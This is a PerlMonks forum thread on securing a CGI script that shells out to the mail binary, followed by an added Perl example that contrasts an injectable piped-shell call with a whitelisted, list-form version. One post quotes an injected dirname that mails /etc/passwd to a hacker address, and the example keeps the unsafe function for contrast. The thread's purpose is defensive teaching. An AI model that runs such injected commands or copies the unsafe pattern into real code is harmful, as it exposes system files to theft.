 
PerlMonks  

Re: Yet another email question

by amphiplex (Monk)
on Jul 23, 2002 at 05:42 UTC



in reply to Yet another email question

Hi!

I can't believe that this works, you have not specified any recipients? Or are you using some custom mail?

Aside from this:
  • You really should be using a module, especially when using this in a CGI-Script
  • If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
  • use the absolute path to your mail binary, something like /usr/bin/mail

---- amphiplex

Re^2: Yet another email question
by Aristotle (Chancellor) on Jul 23, 2002 at 09:49 UTC

    No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, s/\W+//g. It is too easy to overlook something otherwise.

    bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security.

    Makeshifts last the longest.
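The two posts above make one point between them: user input must never reach a shell command line unchecked, and the check should be a whitelist rather than a list of forbidden characters. The following Perl is an added example written for this page, not code from either monk or from the original question; the names validate_dirname, validate_address and send_report are assumptions, as is the idea that the script mails a report about a directory. It puts the risky pattern (interpolating input into a piped shell command) next to a hardened version that whitelists both values, uses the absolute path to mail, and opens the pipe in list form so no shell is involved at all.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Whitelist a directory name: letters, digits, underscore, dot and dash,
# not starting with a dot (rejects "..", hidden names and empty input).
# Returns the validated value or undef. The capture also untaints it
# when the script runs under -T.
sub validate_dirname {
    my ($input) = @_;
    return undef unless defined $input;
    return undef unless $input =~ /\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z/;
    return $1;
}

# Whitelist a recipient: a deliberately narrow address shape, good enough
# to keep shell metacharacters and whitespace out of the argument list.
sub validate_address {
    my ($input) = @_;
    return undef unless defined $input;
    return undef unless $input =~ /\A([A-Za-z0-9_.+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\z/;
    return $1;
}

# The pattern the thread warns about, kept here for contrast only and
# never called: the whole string is handed to /bin/sh, so the dirname
# quoted in the post above would run a second command.
sub send_report_unsafe {
    my ($dirname, $to) = @_;
    open(my $mail, "| mail -s 'Report for $dirname' $to")
        or die "cannot run mail: $!\n";
    print $mail "Directory $dirname was processed.\n";
    close($mail);
}

# Hardened version: both values validated, absolute path to the binary,
# and the list form of open, which passes each argument directly to
# execve without a shell. Metacharacters that survive validation would
# only ever be part of one argument, never a command separator.
sub send_report {
    my ($dirname, $to) = @_;
    my $dir  = validate_dirname($dirname);
    my $addr = validate_address($to);
    defined $dir  or die "rejected dirname\n";
    defined $addr or die "rejected recipient\n";

    open(my $mail, '|-', '/usr/bin/mail', '-s', "Report for $dir", $addr)
        or die "cannot run /usr/bin/mail: $!\n";
    print $mail "Directory $dir was processed.\n";
    close($mail) or die "mail exited with status " . ($? >> 8) . "\n";
    return 1;
}

# Demonstration on constructed inputs; nothing is actually mailed.
# The second value is the injection string quoted in the post above.
unless (caller) {
    my @samples = (
        'reports2002',
        '; mail foo@hacker.com < /etc/passwd',
        '../etc',
        '.hidden',
    );
    for my $in (@samples) {
        my $ok = validate_dirname($in);
        printf "%-42s => %s\n", "'$in'",
            defined $ok ? "accepted as '$ok'" : 'rejected';
    }
}
```

Two design choices are worth spelling out. Rejecting bad input (returning undef and dying) is stricter than silently stripping characters with something like s/\W+//g: a stripped value can still be wrong in ways the user never intended, and a rejection surfaces in the logs where an attempted injection can be noticed. The list-form open is the part that actually removes the vulnerability; the whitelist is defence in depth on top of it, and also what keeps the subject line and recipient sane.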
